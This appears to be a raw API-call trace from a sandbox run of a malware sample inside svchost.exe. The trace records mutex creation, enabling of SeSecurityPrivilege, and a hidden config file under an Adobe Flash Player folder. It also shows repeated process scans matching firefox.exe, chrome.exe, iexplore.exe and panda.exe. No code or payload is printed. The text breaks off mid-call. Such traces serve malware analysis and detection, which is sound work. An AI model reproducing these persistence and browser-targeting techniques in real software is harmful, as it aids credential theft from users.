[0120.683] GetCurrentProcessId () returned 0x2ec [0120.683] wvnsprintfW (in: pszDest=0x5403868, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x745ef8c | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: ") returned 86 [0120.684] wvnsprintfW (in: pszDest=0x5403914, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x745f008 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5415660, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54150c0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000D, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.720] GetSystemTime (in: lpSystemTime=0x745ebd8 | out: lpSystemTime=0x745ebd8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x8c)) [0120.720] SystemTimeToFileTime (in: lpSystemTime=0x745ebd8, lpFileTime=0x745ebc8 | out: lpFileTime=0x745ebc8) returned 1 [0120.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.721] GetUserNameExW () returned 0x1 [0120.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413048, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.723] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="8A") returned 2 [0120.723] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="00") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="00") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="00") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="B7") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="49") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="67") returned 2 [0120.724] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="98") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="F6") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="14") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="59") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="35") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="AA") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="3E") returned 2 [0120.725] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="27") returned 2 [0120.726] wvnsprintfW (in: pszDest=0x745e9c0, cchDest=6, pszFmt="%02X", arglist=0x745e99c | out: pszDest="60") returned 2 [0120.726] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0120.726] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0120.751] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.751] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.752] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.752] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.752] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.752] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.753] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.753] GetCurrentThread () returned 0xfffffffe [0120.753] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x745ec24 | out: TokenHandle=0x745ec24*=0x0) returned 0 [0120.753] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x745ec24 | out: TokenHandle=0x745ec24*=0x1b0) returned 1 [0120.753] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x745ec2c | out: lpLuid=0x745ec2c*(LowPart=0x8, HighPart=0)) returned 1 [0120.754] AdjustTokenPrivileges (in: TokenHandle=0x1b0, DisableAllPrivileges=0, NewState=0x745ec28*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.754] GetLastError () returned 0x0 [0120.754] CloseHandle (hObject=0x1b0) returned 1 [0120.754] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.754] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214130, lpbSaclPresent=0x745ec5c, pSacl=0x745ec50, lpbSaclDefaulted=0x745ec58 | out: lpbSaclPresent=0x745ec5c, pSacl=0x745ec50, lpbSaclDefaulted=0x745ec58) returned 1 [0120.754] SetNamedSecurityInfoW () returned 0x0 [0120.762] LocalFree (hMem=0x5214130) returned 0x0 [0120.762] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.762] GetCurrentThread () returned 0xfffffffe [0120.762] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x745ec24 | out: TokenHandle=0x745ec24*=0x0) returned 0 [0120.762] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x745ec24 | out: TokenHandle=0x745ec24*=0x1b0) returned 1 [0120.762] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x745ec2c | out: lpLuid=0x745ec2c*(LowPart=0x8, HighPart=0)) returned 1 [0120.764] AdjustTokenPrivileges (in: TokenHandle=0x1b0, DisableAllPrivileges=0, NewState=0x745ec28*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.764] GetLastError () returned 0x0 [0120.764] CloseHandle (hObject=0x1b0) returned 1 [0120.764] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.764] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52140a0, lpbSaclPresent=0x745ec5c, pSacl=0x745ec50, lpbSaclDefaulted=0x745ec58 | out: lpbSaclPresent=0x745ec5c, pSacl=0x745ec50, lpbSaclDefaulted=0x745ec58) returned 1 [0120.764] SetNamedSecurityInfoW () returned 0x0 [0120.765] LocalFree (hMem=0x52140a0) returned 0x0 [0120.766] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0120.766] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x745ec70 | out: lpFileSize=0x745ec70*=300) returned 1 [0120.766] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.766] ReadFile (in: hFile=0x1b0, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0x12c, lpNumberOfBytesRead=0x745ec7c, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x745ec7c*=0x12c, lpOverlapped=0x0) returned 1 [0120.767] CloseHandle (hObject=0x1b0) returned 1 [0120.767] wvnsprintfA (in: pszDest=0x5413288, cchDest=21, pszFmt="%d", arglist=0x745ebc0 | out: pszDest="1476366202") returned 10 [0120.768] wvnsprintfA (in: pszDest=0x5413348, cchDest=21, pszFmt="%d", arglist=0x745ebc0 | out: pszDest="1476366203") returned 10 [0120.769] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0120.771] WriteFile (in: hFile=0x1b0, lpBuffer=0x5404878*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x745ec74, lpOverlapped=0x0 | out: lpBuffer=0x5404878*, lpNumberOfBytesWritten=0x745ec74, lpOverlapped=0x0) returned 1 [0120.772] CloseHandle (hObject=0x1b0) returned 1 [0120.774] ReleaseMutex (hMutex=0x1cc) returned 1 [0120.774] CloseHandle (hObject=0x1cc) returned 1 [0120.774] SetLastError (dwErrCode=0x0) [0120.774] WaitForMultipleObjects (nCount=0x2, lpHandles=0x745f094*=0x8, bWaitAll=0, dwMilliseconds=0xea60) Thread: id = 24 os_tid = 0xd78 [0120.219] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="C0") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="00") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="00") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="00") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="84") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="4E") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="E6") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="C4") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="06") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="48") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="47") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="0D") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="34") returned 2 [0120.219] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="5E") returned 2 [0120.220] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="7B") returned 2 [0120.220] wvnsprintfW (in: pszDest=0x755f8b0, cchDest=6, pszFmt="%02X", arglist=0x755f88c | out: pszDest="65") returned 2 [0120.220] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="C0000000844EE6C40648470D345E7B65") returned 0x1d0 [0120.220] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0120.220] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0121.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11580) returned 0xc0000004 [0121.312] VirtualAlloc (lpAddress=0x0, dwSize=0x12580, flAllocationType=0x1000, flProtect=0x4) returned 0x50d0000 [0121.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x50d0000, Length=0x12580, ResultLength=0x0 | out: SystemInformation=0x50d0000, ResultLength=0x0) returned 0x0 [0121.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0121.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0121.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0121.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0121.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0121.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0121.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0121.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0121.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0121.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0121.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0121.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0121.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0121.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0121.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0121.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0121.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0121.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0121.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0121.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0121.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0121.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x1f8 [0121.332] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.332] CloseHandle (hObject=0x1f8) returned 1 [0121.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x1f8 [0121.333] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.333] CloseHandle (hObject=0x1f8) returned 1 [0121.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x1f8 [0121.333] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.333] CloseHandle (hObject=0x1f8) returned 1 [0121.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x1f8 [0121.334] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.334] CloseHandle (hObject=0x1f8) returned 1 [0121.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x1f8 [0121.334] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.334] CloseHandle (hObject=0x1f8) returned 1 [0121.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x1f8 [0121.334] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.335] CloseHandle (hObject=0x1f8) returned 1 [0121.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x1f8 [0121.335] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.335] CloseHandle (hObject=0x1f8) returned 1 [0121.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0121.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0121.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x1f8 [0121.335] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.335] CloseHandle (hObject=0x1f8) returned 1 [0121.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x1f8 [0121.336] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.336] CloseHandle (hObject=0x1f8) returned 1 [0121.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0121.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0121.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x1f8 [0121.338] IsWow64Process (in: hProcess=0x1f8, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0121.338] CloseHandle (hObject=0x1f8) returned 1 [0121.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x1f8 [0121.339] OpenProcessToken (in: ProcessHandle=0x1f8, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x1fc) returned 1 [0121.339] GetTokenInformation (in: TokenHandle=0x1fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0121.339] GetLastError () returned 0x7a [0121.340] GetTokenInformation (in: TokenHandle=0x1fc, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0121.340] GetTokenInformation (in: TokenHandle=0x1fc, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0121.341] CloseHandle (hObject=0x1fc) returned 1 [0121.341] CloseHandle (hObject=0x1f8) returned 1 [0121.341] GetLengthSid (pSid=0x54010a8) returned 0x1c [0121.341] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0121.341] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0121.341] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0121.341] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0121.342] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0122.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x113f0) returned 0xc0000004 [0122.392] VirtualAlloc (lpAddress=0x0, dwSize=0x123f0, flAllocationType=0x1000, flProtect=0x4) returned 0x5340000 [0122.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x5340000, Length=0x123f0, ResultLength=0x0 | out: SystemInformation=0x5340000, ResultLength=0x0) returned 0x0 [0122.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0122.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0122.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0122.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0122.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0122.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0122.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x1cc [0122.450] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.451] CloseHandle (hObject=0x1cc) returned 1 [0122.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x1cc [0122.451] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.451] CloseHandle (hObject=0x1cc) returned 1 [0122.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x1cc [0122.451] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.451] CloseHandle (hObject=0x1cc) returned 1 [0122.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x1cc [0122.451] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.452] CloseHandle (hObject=0x1cc) returned 1 [0122.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x1cc [0122.452] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.452] CloseHandle (hObject=0x1cc) returned 1 [0122.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x1cc [0122.452] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.452] CloseHandle (hObject=0x1cc) returned 1 [0122.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 